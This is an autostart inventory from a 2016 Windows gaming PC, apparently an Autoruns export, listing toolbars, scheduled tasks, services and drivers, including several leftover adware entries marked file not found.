+ "Norton Toolbar" "coIEPlugIn" "Symantec Corporation" "c:\program files (x86)\norton 360\engine64\22.8.1.14\coieplg.dll" "11/11/2016 21:09" ""
"HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Toolbar" "" "" "" "" ""
+ "Google Toolbar" "Google Toolbar" "Google Inc." "c:\program files (x86)\google\google toolbar\googletoolbar_32.dll" "31/10/2016 23:01" ""
+ "Norton Toolbar" "coIEPlugIn" "Symantec Corporation" "c:\program files (x86)\norton 360\engine\22.8.1.14\coieplg.dll" "11/11/2016 21:09" ""
"HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions" "" "" "" "" ""
+ "&Blog This in Windows Live Writer" "Windows Live Writer Blog This Extension" "Microsoft Corporation" "c:\program files (x86)\windows live\writer\writerbrowserextension.dll" "01/04/2014 04:28" ""
"Task Scheduler" "" "" "" "" ""
+ "\Adobe Flash Player Updater" "Adobe® Flash® Player Update Service 23.0 r0" "Adobe Systems Incorporated" "c:\windows\syswow64\macromed\flash\flashplayerupdateservice.exe" "30/08/2016 00:01" ""
+ "\ASC9_PerformanceMonitor" "Performance Monitor" "IObit" "c:\program files (x86)\iobit\advanced systemcare\monitor.exe" "26/05/2016 05:53" ""
+ "\ASC9_SkipUac_Nathan" "Advanced SystemCare 9" "IObit" "c:\program files (x86)\iobit\advanced systemcare\asc.exe" "28/07/2016 06:41" ""
+ "\DNSKALAMAZOO" "" "" "File not found: C:\Program Files (x86)\DNS Unlocker\dnskalamazoo.exe" "" ""
+ "\Driver Booster Scheduler" "Driver Booster Scheduler" "IObit" "c:\program files (x86)\iobit\driver booster\scheduler.exe" "13/07/2016 02:14" ""
+ "\Driver Booster SkipUAC (Nathan)" "Driver Booster 3" "IObit" "c:\program files (x86)\iobit\driver booster\driverbooster.exe" "15/07/2016 09:14" ""
+ "\DriverUpdate Scan" "DriverUpdate" "SlimWare Utilities, Inc." "c:\program files (x86)\driverupdate\driverupdate.exe" "12/07/2016 17:57" ""
+ "\DriverUpdate Startup" "DriverUpdate" "SlimWare Utilities, Inc." "c:\program files (x86)\driverupdate\driverupdate.exe" "12/07/2016 17:57" ""
+ "\FRAPS" "Fraps" "Beepa P/L" "c:\fraps\fraps.exe" "05/09/2015 08:02" ""
+ "\GoogleUpdateTaskMachineCore" "Google Installer" "Google Inc." "c:\program files (x86)\google\update\googleupdate.exe" "22/08/2015 02:13" ""
+ "\GoogleUpdateTaskMachineUA" "Google Installer" "Google Inc." "c:\program files (x86)\google\update\googleupdate.exe" "22/08/2015 02:13" ""
+ "\IBUpd2" "" "" "File not found: C:\Users\Nathan\AppData\Local\BrowserAir\44.5.0.2\updater.exe" "" ""
+ "\LuckyBrowse" "" "" "File not found: C:\Program Files (x86)\LuckyBrowse\app\luckybrowse.exe" "" ""
+ "\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task" "Windows Live Social Object Extractor Engine" "Microsoft Corporation" "c:\program files (x86)\windows live\soxe\wlsoxe.dll" "01/04/2014 04:28" ""
+ "\Microsoft\Windows\NetTrace\GatherNetworkInfo" "" "" "c:\windows\system32\gathernetworkinfo.vbs" "16/07/2016 11:42" ""
+ "\Microsoft\Windows\Windows Media Sharing\UpdateLibrary" "Windows Media Player Network Sharing Service Configuration Application" "Microsoft Corporation" "c:\program files\windows media player\wmpnscfg.exe" "16/07/2016 02:25" ""
+ "\Norton 360\Norton Autofix" "Symantec Error Reporting" "Symantec Corporation" "c:\program files (x86)\norton 360\engine\22.8.1.14\symerr.exe" "31/08/2016 18:49" ""
+ "\Norton 360\Norton Error Analyzer" "Symantec Error Reporting" "Symantec Corporation" "c:\program files (x86)\norton 360\engine\22.8.1.14\symerr.exe" "31/08/2016 18:49" ""
+ "\Norton 360\Norton Error Processor" "Symantec Error Reporting" "Symantec Corporation" "c:\program files (x86)\norton 360\engine\22.8.1.14\symerr.exe" "31/08/2016 18:49" ""
+ "\Norton WSC Integration" "WSCStub" "Symantec Corporation" "c:\program files (x86)\norton 360\engine\22.8.1.14\wscstub.exe" "12/11/2016 03:30" ""
+ "\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA nodejs launcher" "NVIDIA Corporation" "c:\program files (x86)\nvidia corporation\nvnode\nvnodejslauncher.exe" "16/11/2016 16:38" ""
+ "\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA driver profile updater" "NVIDIA Corporation" "c:\program files\nvidia corporation\update core\nvprofileupdater64.exe" "17/11/2016 10:16" ""
+ "\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA driver profile updater" "NVIDIA Corporation" "c:\program files\nvidia corporation\update core\nvprofileupdater64.exe" "17/11/2016 10:16" ""
+ "\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA telemetry monitor" "NVIDIA Corporation" "c:\program files (x86)\nvidia corporation\update core\nvtmmon.exe" "17/11/2016 10:12" ""
+ "\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA crash and telemetry reporter" "NVIDIA Corporation" "c:\program files (x86)\nvidia corporation\update core\nvtmrep.exe" "17/11/2016 10:11" ""
+ "\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" "NVIDIA crash and telemetry reporter" "NVIDIA Corporation" "c:\program files (x86)\nvidia corporation\update core\nvtmrep.exe" "17/11/2016 10:11" ""
+ "\OneDrive Standalone Update Task" "Standalone Updater" "Microsoft Corporation" "c:\users\nathan\appdata\local\microsoft\onedrive\17.3.6517.0809\onedrivestandaloneupdater.exe" "09/08/2016 18:20" ""
+ "\Overwolf Updater Task" "OverwolfUpdater" "Overwolf LTD" "c:\program files (x86)\overwolf\overwolfupdater.exe" "23/11/2016 10:47" ""
+ "\Selection Tools Update" "Selection Tools" "Nosibay" "c:\users\nathan\appdata\roaming\wtools\selection tools\selection tools.exe" "17/11/2015 14:25" ""
+ "\SlimCleaner Plus (Scheduled Scan - Nathan)" "SlimCleaner Plus" "Slimware Utilities Holdings, Inc." "c:\program files\slimcleaner plus\slimcleanerplus.exe" "25/07/2016 21:32" ""
+ "\SmartDefrag_AutoAnalyze" "AutoDefrg" "IObit" "c:\program files (x86)\iobit\smart defrag\autodefrag.exe" "06/06/2016 06:54" ""
+ "\SmartDefrag_Startup" "Smart Defrag 5" "IObit" "c:\program files (x86)\iobit\smart defrag\smartdefrag.exe" "27/07/2016 03:06" ""
+ "\SmartDefrag_Update" "Smart Defrag Updater" "IObit" "c:\program files (x86)\iobit\smart defrag\autoupdate.exe" "21/07/2016 11:16" ""
+ "\SuperbGameBoost" "" "SuperBoost Software" "c:\program files (x86)\superboost\superb game boost\superbgameboostmain.exe" "11/05/2016 09:46" ""
+ "\Uninstaller_SkipUac_Nathan" "Uninstall Programs" "IObit" "c:\program files (x86)\iobit\iobit uninstaller\iobituninstaler.exe" "24/06/2016 02:57" ""
+ "\WindApp Update" "" "" "File not found: C:\Users\Nathan\AppData\Roaming\Store\WindApp\WindApp Update.exe" "" ""
+ "\{790A0E47-0508-097E-0F11-0F7A7E0A1104}" "" "" "File not found: bypass" "" ""
+ "\{7D50DE2D-8C63-E41E-4D44-FCDB07020749}" "" "" "File not found: C:\PROGRA~3\89956195\a8be60d6.dll" "" ""
"HKLM\System\CurrentControlSet\Services" "" "" "" "" ""
+ "Adobe LM Service" "AdobeLM Service" "Adobe Systems" "c:\program files (x86)\common files\adobe systems shared\service\adobelmsvc.exe" "07/01/2005 14:00" ""
+ "AdobeFlashPlayerUpdateSvc" "This service keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes." "Adobe Systems Incorporated" "c:\windows\syswow64\macromed\flash\flashplayerupdateservice.exe" "30/08/2016 00:01" ""
+ "AdobeUpdateService" "Adobe Update Service" "Adobe Systems Incorporated" "c:\program files (x86)\common files\adobe\adobe desktop common\elevationmanager\adobeupdateservice.exe" "25/10/2016 17:23" ""
+ "AdvancedSystemCareService9" "Advanced SystemCare Service" "IObit" "c:\program files (x86)\iobit\advanced systemcare\ascservice.exe" "22/07/2016 09:56" ""
+ "AGSService" "Adobe Genuine Software Integrity Service" "Adobe Systems, Incorporated" "c:\program files (x86)\common files\adobe\adobegcclient\agsservice.exe" "26/09/2016 12:45" ""
+ "APNMCP" "The Ask Update Service keeps your toolbar software powered by Ask up to date." "APN LLC." "c:\program files (x86)\askpartnernetwork\toolbar\apnmcp.exe" "09/09/2015 21:03" ""
+ "asComSvc" "" "" "c:\program files (x86)\asus\axsp\1.02.00\atkexcomsvc.exe" "07/05/2013 02:17" ""
+ "avgsvc" "AVG Service" "AVG Technologies CZ, s.r.o." "c:\program files (x86)\avg\framework\common\avgsvca.exe" "12/11/2015 15:57" ""
+ "BEService" "" "" "c:\program files (x86)\common files\battleye\beservice.exe" "06/10/2016 20:06" ""
+ "CGVPNCliService" "Service for CyberGhost 5" "CyberGhost S.R.L" "c:\program files\cyberghost 5\service.exe" "11/01/2016 11:58" ""
+ "GalaxyClientService" "GOG Galaxy component required to download games" "GOG.com" "c:\program files (x86)\galaxyclient\galaxyclientservice.exe" "06/12/2016 13:08" ""
+ "GalaxyCommunication" "Network communication component for GOG Galaxy" "GOG.com" "c:\programdata\gog.com\galaxy\redists\galaxycommunication.exe" "10/11/2016 12:18" ""
+ "gupdate" "Keeps your Google software up to date. If this service is disabled or stopped, your Google software will not be kept up to date, meaning security vulnerabilities that may arise cannot be fixed and features may not work. This service uninstalls itself when there is no Google software using it." "Google Inc." "c:\program files (x86)\google\update\googleupdate.exe" "22/08/2015 02:13" ""
+ "gupdatem" "Keeps your Google software up to date. If this service is disabled or stopped, your Google software will not be kept up to date, meaning security vulnerabilities that may arise cannot be fixed and features may not work. This service uninstalls itself when there is no Google software using it." "Google Inc." "c:\program files (x86)\google\update\googleupdate.exe" "22/08/2015 02:13" ""
+ "gusvc" "Google Updater keeps your Google software up to date. If Google Updater Service is disabled or stopped, your Google software will not be kept up to date, meaning that security vulnerabilities that may arise cannot be fixed and features may not work." "Google" "c:\program files (x86)\google\common\google updater\googleupdaterservice.exe" "02/03/2012 21:13" ""
+ "Hamachi2Svc" "Hamachi Client Tunneling Engine" "LogMeIn Inc." "c:\program files (x86)\logmein hamachi\x64\hamachi-2.exe" "11/11/2016 12:46" ""
+ "IAStorDataMgrSvc" "Provides storage event notification and manages communication between the storage driver and user space applications." "Intel Corporation" "c:\program files\intel\intel(r) rapid storage technology\iastordatamgrsvc.exe" "02/05/2014 23:08" ""
+ "IMFservice" "IObit Malware Fighter Service" "IObit" "c:\program files (x86)\iobit\iobit malware fighter\imfsrv.exe" "13/06/2016 06:25" ""
+ "Intel(R) Capability Licensing Service TCP IP Interface" "Version: 1.35.127.1" "Intel(R) Corporation" "c:\program files\intel\icls client\socketheciserver.exe" "31/01/2014 14:41" ""
+ "jhi_service" "Intel(R) Dynamic Application Loader Host Interface Service - Allows applications to access the local Intel (R) DAL" "Intel Corporation" "c:\program files (x86)\intel\intel(r) management engine components\dal\jhi_service.exe" "26/02/2014 02:50" ""
+ "LDrvSvc" "System device driver service. Any reliant services would be disabled without it turning on." "" "c:\program files (x86)\ostotosoft\drivertalent\ldrvsvc.dll" "08/07/2016 08:16" ""
+ "LicCtrlService" "License Control Service" "" "c:\windows\runservice.exe" "23/04/2000 22:22" ""
+ "LiveUpdateSvc" "LiveUpdate" "IObit" "c:\program files (x86)\iobit\liveupdate\liveupdate.exe" "03/06/2016 07:39" ""
+ "LMIGuardianSvc" "Support LogMeIn processes with quality assurance feedback" "LogMeIn, Inc." "c:\program files (x86)\logmein hamachi\x64\lmiguardiansvc.exe" "27/05/2016 13:03" ""
+ "LMS" "Intel(R) Management and Security Application Local Management Service - Provides OS-related Intel(R) ME functionality." "Intel Corporation" "c:\program files (x86)\intel\intel(r) management engine components\lms\lms.exe" "26/02/2014 02:48" ""
+ "MozillaMaintenance" "The Mozilla Maintenance Service ensures that you have the latest and most secure version of Mozilla Firefox on your computer. Keeping Firefox up to date is very important for your online security, and Mozilla strongly recommends that you keep this service enabled." "Mozilla Foundation" "c:\program files (x86)\mozilla maintenance service\maintenanceservice.exe" "14/10/2015 23:28" ""
+ "N360" "Norton 360" "Symantec Corporation" "c:\program files (x86)\norton 360\engine\22.8.1.14\n360.exe" "08/09/2016 21:39" ""
+ "NvContainerLocalSystem" "Container service for NVIDIA root features" "NVIDIA Corporation" "c:\program files\nvidia corporation\nvcontainer\nvcontainer.exe" "11/11/2016 21:15" ""
+ "NvContainerNetworkService" "Container service for NVIDIA network features" "NVIDIA Corporation" "c:\program files\nvidia corporation\nvcontainer\nvcontainer.exe" "11/11/2016 21:15" ""
+ "NVDisplay.ContainerLocalSystem" "Container service for NVIDIA root features" "NVIDIA Corporation" "c:\program files\nvidia corporation\display.nvcontainer\nvdisplay.container.exe" "17/11/2016 00:14" ""
+ "NVIDIA Wireless Controller Service" "NVIDIA Wireless Controller Service" "NVIDIA Corporation" "c:\program files\nvidia corporation\geforce experience service\nvwirelesscontroller.exe" "16/11/2016 16:37" ""
+ "Origin Client Service" "OriginClientService" "Electronic Arts" "c:\program files (x86)\origin\originclientservice.exe" "24/11/2016 19:32" ""
+ "Origin Web Helper Service" "OriginWebHelperService" "Electronic Arts" "c:\program files (x86)\origin\originwebhelperservice.exe" "24/11/2016 19:35" ""
+ "OverwolfUpdater" "OverwolfUpdater" "Overwolf LTD" "c:\program files (x86)\overwolf\overwolfupdater.exe" "23/11/2016 10:47" ""
+ "sgbupt" "SuperBoost Updater" "SuperBoost Software" "c:\program files (x86)\superboost\superboost software updater\superboostupdater.exe" "21/04/2016 08:25" ""
+ "SkypeUpdate" "Enables the detection, download and installation of updates for Skype." "Skype Technologies" "c:\program files (x86)\skype\updater\updater.exe" "20/09/2016 12:51" ""
+ "SlimService" "Services SlimWare Utilities applications and products." "SlimWare Utilities, Inc." "c:\program files\slimservice\slimservicefactory.exe" "16/06/2016 22:15" ""
+ "Steam Client Service" "Steam Client Service monitors and updates Steam content" "Valve Corporation" "c:\program files (x86)\common files\steam\steamservice.exe" "13/10/2016 00:47" ""
+ "TunnelBearMaintenance" "TBear.Maintenance" "" "c:\program files (x86)\tunnelbear\tbear.maintenance.exe" "10/02/2016 11:24" ""
+ "WdNisSvc" "Helps guard against intrusion attempts targeting known and newly discovered vulnerabilities in network protocols" "Microsoft Corporation" "c:\program files\windows defender\nissrv.exe" "16/07/2016 02:24" ""
+ "WinDefend" "Helps protect users from malware and other potentially unwanted software" "Microsoft Corporation" "c:\program files\windows defender\msmpeng.exe" "16/07/2016 02:27" ""
+ "WMPNetworkSvc" "Shares Windows Media Player libraries with other networked players and media devices using Universal Plug and Play" "Microsoft Corporation" "c:\program files\windows media player\wmpnetwk.exe" "07/09/2016 04:41" ""
"HKLM\System\CurrentControlSet\Services" "" "" "" "" ""
+ "3ware" "LSI 3ware SCSI Storport Driver" "LSI" "c:\windows\system32\drivers\3ware.sys" "18/05/2015 22:28" ""
+ "ADP80XX" "PMC-Sierra Storport Driver For SPC8x6G SAS/SATA controller" "PMC-Sierra" "c:\windows\system32\drivers\adp80xx.sys" "09/04/2015 20:49" ""
+ "amdsata" "AHCI 1.3 Device Driver" "Advanced Micro Devices" "c:\windows\system32\drivers\amdsata.sys" "14/05/2015 12:14" ""
+ "amdsbs" "AMD Technology AHCI Compatible Controller Driver for Windows - AMD64 platform" "AMD Technologies Inc." "c:\windows\system32\drivers\amdsbs.sys" "11/12/2012 21:21" ""
+ "amdxata" "Storage Filter Driver" "Advanced Micro Devices" "c:\windows\system32\drivers\amdxata.sys" "01/05/2015 00:55" ""
+ "arcsas" "Adaptec SAS RAID WS03 Driver" "PMC-Sierra, Inc." "c:\windows\system32\drivers\arcsas.sys" "09/04/2015 19:12" ""
+ "AsIO" "" "" "c:\windows\syswow64\drivers\asio.sys" "22/08/2012 09:54" ""
+ "b06bdrv" "QLogic Gigabit Ethernet VBD" "QLogic Corporation" "c:\windows\system32\drivers\bxvbda.sys" "25/05/2016 07:03" ""
+ "BCM43XX" "Broadcom 802.11 Network Adapter wireless driver" "Broadcom Corporation" "c:\windows\system32\drivers\bcmwl664.sys" "06/02/2014 02:30" ""
+ "bcmfn" "BCM Function 2 Device Driver" "Windows (R) Win 7 DDK provider" "c:\windows\system32\drivers\bcmfn.sys" "08/06/2015 08:32" ""
+ "bcmfn2" "BCM Function 2 Device Driver" "Windows (R) Win 7 DDK provider" "c:\windows\system32\drivers\bcmfn2.sys" "16/03/2014 10:07" ""
+ "BCMWL63A" "Broadcom WiFi Driver wireless driver" "Broadcom Corp" "c:\windows\system32\drivers\bcmwl63a.sys" "23/11/2015 22:56" ""
+ "BEDaisy" "" "" "c:\program files (x86)\common files\battleye\bedaisy.sys" "02/10/2016 07:06" ""
+ "BHDrvx64" "SONAR Engine Driver" "Symantec Corporation" "c:\program files (x86)\norton 360\nortondata\22.5.4.24\definitions\bashdefs\20161208.001\bhdrvx64.sys" "04/11/2016 09:39" ""
+ "ccSet_N360" "Common Client Settings Driver" "Symantec Corporation" "c:\windows\system32\drivers\n360x64\1608010.00e\ccsetx64.sys" "05/05/2016 22:33" ""
+ "cht4iscsi" "Chelsio iSCSI VMiniport Driver" "Chelsio Communications" "c:\windows\system32\drivers\cht4sx64.sys" "20/04/2016 09:54" ""
+ "cht4vbd" "Virtual Bus Driver for Chelsio ® T4 Chipset" "Chelsio Communications" "c:\windows\system32\drivers\cht4vx64.sys" "15/04/2016 07:32" ""
+ "CMUSBDAC" "C-MEDIA CMUSBDAC Audio Driver" "C-MEDIA" "c:\windows\system32\drivers\cmusbdac.sys" "31/07/2015 06:41" ""
+ "CorsairVBusDriver" "Corsair virtual bus driver" "Corsair" "c:\windows\system32\drivers\corsairvbusdriver.sys" "06/05/2015 13:10" ""
+ "CorsairVHidDriver" "Corsair virtual device driver" "Corsair" "c:\windows\system32\drivers\corsairvhiddriver.sys" "06/05/2015 13:10" ""
+ "ebdrv" "QLogic 10 GigE VBD" "QLogic Corporation" "c:\windows\system32\drivers\evbda.sys" "25/05/2016 07:01" ""
+ "eeCtrl" "Symantec Eraser Control Driver" "Symantec Corporation" "c:\program files (x86)\common files\symantec shared\eengine\eectrl64.sys" "17/09/2016 02:16" ""
+ "ElgatoGC658Y" "AVSTREAM driver" "UB658" "c:\windows\system32\drivers\elgatogc658.sys" "05/11/2015 08:27" ""
+ "ElgatoVAD" "Sound Capture" "Elgato Systems GmbH" "c:\windows\system32\drivers\elgatovad.sys" "09/08/2016 08:51" ""
+ "EraserUtilRebootDrv" "Symantec Eraser Utility Driver" "Symantec Corporation" "c:\program files (x86)\common files\symantec shared\eengine\eraserutilrebootdrv.sys" "17/09/2016 02:16" ""
+ "Hamachi" "LogMeIn Hamachi Virtual Miniport Driver" "LogMeIn Inc." "c:\windows\system32\drivers\hamdrv.sys" "30/03/2015 13:28" ""
+ "HpSAMD" "Smart Array SAS/SATA Controller Media Driver" "Hewlett-Packard Company" "c:\windows\system32\drivers\hpsamd.sys" "26/03/2013 21:36" ""
+ "HWiNFO32" "HWiNFO AMD64 Kernel Driver" "REALiX(tm)" "c:\windows\syswow64\drivers\hwinfo64a.sys" "31/03/2015 09:51" ""
+ "iagpio" "Intel(R) Serial IO GPIO Controller Driver" "Intel(R) Corporation" "c:\windows\system32\drivers\iagpio.sys" "18/02/2016 07:35" ""
+ "iai2c" "Intel(R) Serial IO I2C Driver" "Intel(R) Corporation" "c:\windows\system32\drivers\iai2c.sys" "22/09/2015 06:53" ""
+ "iaLPSS2i_GPIO2" "Intel(R) Serial IO GPIO Driver v2" "Intel Corporation" "c:\windows\system32\drivers\ialpss2i_gpio2.sys" "03/03/2016 02:06" ""
+ "iaLPSS2i_I2C" "Intel(R) Serial IO I2C Driver v2" "Intel Corporation" "c:\windows\system32\drivers\ialpss2i_i2c.sys" "03/03/2016 02:06" ""
+ "iaLPSSi_GPIO" "Intel(R) Serial IO GPIO Controller Driver" "Intel Corporation" "c:\windows\system32\drivers\ialpssi_gpio.sys" "02/02/2015 09:00" ""
+ "iaLPSSi_I2C" "Intel(R) Serial IO I2C Controller Driver" "Intel Corporation" "c:\windows\system32\drivers\ialpssi_i2c.sys" "24/02/2015 15:52" ""
+ "iaStorA" "Intel(R) Rapid Storage Technology driver - x64" "Intel Corporation" "c:\windows\system32\drivers\iastora.sys" "08/03/2016 14:00" ""
+ "iaStorAV" "Intel(R) Rapid Storage Technology driver (inbox) - x64" "Intel Corporation" "c:\windows\system32\drivers\iastorav.sys" "19/02/2015 12:08" ""
+ "iaStorV" "Intel Matrix Storage Manager driver - x64" "Intel Corporation" "c:\windows\system32\drivers\iastorv.sys" "11/04/2011 18:48" ""
+ "ibbus" "InfiniBand Fabric Bus Driver" "Mellanox" "c:\windows\system32\drivers\ibbus.sys" "10/04/2016 13:46" ""
+ "IDSVia64" "Symantec Intrusion Prevention Driver" "Symantec Corporation" "c:\program files (x86)\norton 360\nortondata\22.5.4.24\definitions\ipsdefs\20161208.005\idsvia64.sys" "19/10/2016 22:31" ""
+ "IMFFilter" "File Filter driver of IMF" "IObit" "c:\program files (x86)\iobit\iobit malware fighter\drivers\win7_amd64\imffilter.sys" "22/12/2015 03:05" ""
+ "IntcAzAudAddService" "Realtek(r) High Definition Audio Function Driver" "Realtek Semiconductor Corp." "c:\windows\system32\drivers\rtkvhd64.sys" "30/09/2014 12:02" ""
+ "LSI_SAS" "LSI Fusion-MPT SAS Driver (StorPort)" "LSI Corporation" "c:\windows\system32\drivers\lsi_sas.sys" "25/03/2015 19:36" ""
+ "LSI_SAS2i" "LSI SAS Gen2 Driver (StorPort)" "LSI Corporation" "c:\windows\system32\drivers\lsi_sas2i.sys" "28/03/2016 18:49" ""
+ "LSI_SAS3i" "Avago SAS Gen3 Driver (StorPort)" "Avago Technologies" "c:\windows\system32\drivers\lsi_sas3i.sys" "28/03/2016 18:49" ""
+ "LSI_SSS" "LSI SSS PCIe/Flash Driver (StorPort)" "LSI Corporation" "c:\windows\system32\drivers\lsi_sss.sys" "15/03/2013 23:39" ""
+ "megasas" "MEGASAS RAID Controller Driver for Windows" "Avago Technologies" "c:\windows\system32\drivers\megasas.sys" "05/03/2015 02:36" ""
+ "megasas2i" "MEGASAS RAID Controller Driver for Windows" "Avago Technologies" "c:\windows\system32\drivers\megasas2i.sys" "22/07/2016 21:36" ""
+ "megasr" "LSI MegaRAID Software RAID Driver" "LSI Corporation, Inc." "c:\windows\system32\drivers\megasr.sys" "03/06/2013 22:02" ""
+ "MEIx64" "Intel(R) Management Engine Interface" "Intel Corporation" "c:\windows\system32\drivers\teedriverw8x64.sys" "03/02/2016 22:41" ""
+ "mlx4_bus" "MLX4 Bus Driver" "Mellanox" "c:\windows\system32\drivers\mlx4_bus.sys" "10/04/2016 13:49" ""
+ "mvumis" "Marvell Flash Controller Driver" "Marvell Semiconductor, Inc." "c:\windows\system32\drivers\mvumis.sys" "23/05/2014 20:39" ""
+ "NAVENG" "" "" "File not found: C:\Program Files (x86)\Norton 360\NortonData\22.5.4.24\Definitions\SDSDefs\20161209.001\ENG64.SYS" "" ""
+ "NAVEX15" "" "" "File not found: C:\Program Files (x86)\Norton 360\NortonData\22.5.4.24\Definitions\SDSDefs\20161209.001\EX64.SYS" "" ""
+ "ndfltr" "NetworkDirect Support Filter Driver" "Mellanox" "c:\windows\system32\drivers\ndfltr.sys" "10/04/2016 13:46" ""
+ "NetAdapterCx" "" "" "c:\windows\system32\drivers\netadaptercx.sys" "16/07/2016 02:28" ""
+ "NVHDA" "NVIDIA HDMI Audio Driver" "NVIDIA Corporation" "c:\windows\system32\drivers\nvhda64v.sys" "29/09/2016 13:25" ""
+ "nvlddmkm" "NVIDIA Windows Kernel Mode Driver, Version 375.95 " "NVIDIA Corporation" "c:\windows\system32\driverstore\filerepository\nv_dispi.inf_amd64_410e5247be0e5f00\nvlddmkm.sys" "17/11/2016 00:26" ""
+ "nvraid" "NVIDIA® nForce(TM) RAID Driver" "NVIDIA Corporation" "c:\windows\system32\drivers\nvraid.sys" "21/04/2014 18:28" ""
+ "nvstor" "NVIDIA® nForce(TM) Sata Performance Driver" "NVIDIA Corporation" "c:\windows\system32\drivers\nvstor.sys" "21/04/2014 18:34" ""
+ "NvStreamKms" "Nvidia Streaming Kernel Service" "NVIDIA Corporation" "c:\program files\nvidia corporation\nvstreamsrv\nvstreamkms.sys" "03/11/2016 20:09" ""
+ "nvvad_WaveExtensible" "NVIDIA Virtual Audio Driver" "NVIDIA Corporation" "c:\windows\system32\drivers\nvvad64v.sys" "04/10/2016 07:20" ""
+ "percsas2i" "MEGASAS RAID Controller Driver for Windows" "Avago Technologies" "c:\windows\system32\drivers\percsas2i.sys" "15/03/2016 00:50" ""
+ "percsas3i" "MEGASAS RAID Controller Driver for Windows" "Avago Technologies" "c:\windows\system32\drivers\percsas3i.sys" "04/03/2016 21:22" ""
+ "RegFilter" "Registry Filter" "IObit.com" "c:\program files (x86)\iobit\iobit malware fighter\drivers\win7_amd64\regfilter.sys" "19/11/2013 04:39" ""
+ "rt640x64" "Realtek 8101E/8168/8169 NDIS 6.40 64-bit Driver " "Realtek " "c:\windows\system32\drivers\rt640x64.sys" "11/03/2016 05:57" ""
+ "SiSRaid2" "SiS RAID Stor Miniport Driver" "Silicon Integrated Systems Corp." "c:\windows\system32\drivers\sisraid2.sys" "24/09/2008 18:28" ""
+ "SiSRaid4" "SiS AHCI Stor-Miniport Driver" "Silicon Integrated Systems" "c:\windows\system32\drivers\sisraid4.sys" "01/10/2008 21:56" ""
+ "SmartDefragDriver" "File driver of SmartDefrag" "IObit" "c:\windows\system32\drivers\smartdefragdriver.sys" "23/12/2013 10:05" ""
+ "SRTSP" "Symantec AutoProtect" "Symantec Corporation" "c:\windows\system32\drivers\n360x64\1608010.00e\srtsp64.sys" "14/09/2016 01:14" ""
+ "SRTSPX" "Symantec AutoProtect" "Symantec Corporation" "c:\windows\system32\drivers\n360x64\1608010.00e\srtspx64.sys" "03/09/2016 01:56" ""
+ "stexstor" "Promise SuperTrak EX Series Driver for Windows x64" "Promise Technology, Inc." "c:\windows\system32\drivers\stexstor.sys" "27/11/2012 00:02" ""
+ "SWDUMon" "Driver Update Installer Monitor" "" "c:\windows\system32\drivers\swdumon.sys" "20/07/2010 14:13" ""
+ "SymEFASI" "Symantec Extended File Attributes" "Symantec Corporation" "c:\windows\system32\drivers\n360x64\1608010.00e\symefasi64.sys" "12/10/2016 18:18" ""
+ "SymELAM" "Symantec ELAM" "Symantec Corporation" "c:\windows\system32\drivers\n360x64\1608010.00e\symelam.sys" "05/06/2012 01:04" ""
+ "SymEvent" "Symantec Event Library" "Symantec Corporation" "c:\windows\system32\drivers\symevent64x86.sys" "08/09/2016 19:47" ""
+ "SymIRON" "Iron Driver" "Symantec Corporation" "c:\windows\system32\drivers\n360x64\1608010.00e\ironx64.sys" "02/09/2016 21:44" ""
+ "SymNetS" "Network Security Driver" "Symantec Corporation" "c:\windows\system32\drivers\n360x64\1608010.00e\symnets.sys" "15/09/2016 02:43" ""
+ "tap0901" "TAP-Windows Virtual Network Driver" "The OpenVPN Project" "c:\windows\system32\drivers\tap0901.sys" "22/08/2013 12:40" ""
+ "vsmraid" "VIA RAID DRIVER FOR AMD-X86-64" "VIA Technologies Inc.,Ltd" "c:\windows\system32\drivers\vsmraid.sys" "22/04/2014 19:21" ""
+ "VSTXRAID" "VIA StorX RAID Controller Driver" "VIA Corporation" "c:\windows\system32\drivers\vstxraid.sys" "21/01/2013 19:00" ""
+ "WinMad" "Kernel WinMad" "Mellanox" "c:\windows\system32\drivers\winmad.sys" "10/04/2016 13:46" ""
+ "WinVerbs" "Kernel WinVerbs" "Mellanox" "c:\windows\system32\drivers\winverbs.sys" "10/04/2016 13:46" ""
+ "XSplit_Dummy" "XSplit Stream Audio" "SplitmediaLabs Limited" "c:\windows\system32\drivers\xspltspk.sys" "11/06/2014 20:59" ""
+ "{687703DE-DC6D-4649-892B-B8497854A6AB}" "" "CyberLink Corp." "c:\program files (x86)\cyberlink\powerdvd15\common\navfilter\000.fcl" "25/08/2014 07:32" ""
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers" "" "" "" "" ""
+ "Adobe Type Manager" "Windows NT OpenType/Type 1 Font Driver" "Adobe Systems Incorporated" "c:\windows\system32\atmfd.dll" "02/11/2016 10:31" ""
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32" "" "" "" "" ""
+ "msacm.l3acm" "MPEG Layer-3 Audio Codec for MSACM" "Fraunhofer Institut Integrierte Schaltungen IIS" "c:\windows\system32\l3codeca.acm" "16/07/2016 02:26" ""
+ "VIDC.FPS1" "Fraps" "Beepa P/L" "c:\windows\system32\frapsv64.dll" "05/09/2015 08:09" ""
"HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32" "" "" "" "" ""
+ "msacm.l3acm" "MPEG Layer-3 Audio Codec for MSACM" "Fraunhofer Institut Integrierte Schaltungen IIS" "c:\windows\syswow64\l3codeca.acm" "16/07/2016 01:41" ""
+ "msacm.l3codecp" "MPEG Audio Layer-3 Codec for MSACM" "Fraunhofer Institut Integrierte Schaltungen IIS" "c:\windows\syswow64\l3codecp.acm" "16/07/2016 01:43" ""
+ "vidc.cvid" "Cinepak® Codec" "Radius Inc." "c:\windows\syswow64\iccvid.dll" "16/07/2016 01:42" ""
+ "VIDC.FPS1" "Fraps" "Beepa P/L" "c:\windows\syswow64\frapsvid.dll" "05/09/2015 08:09" ""
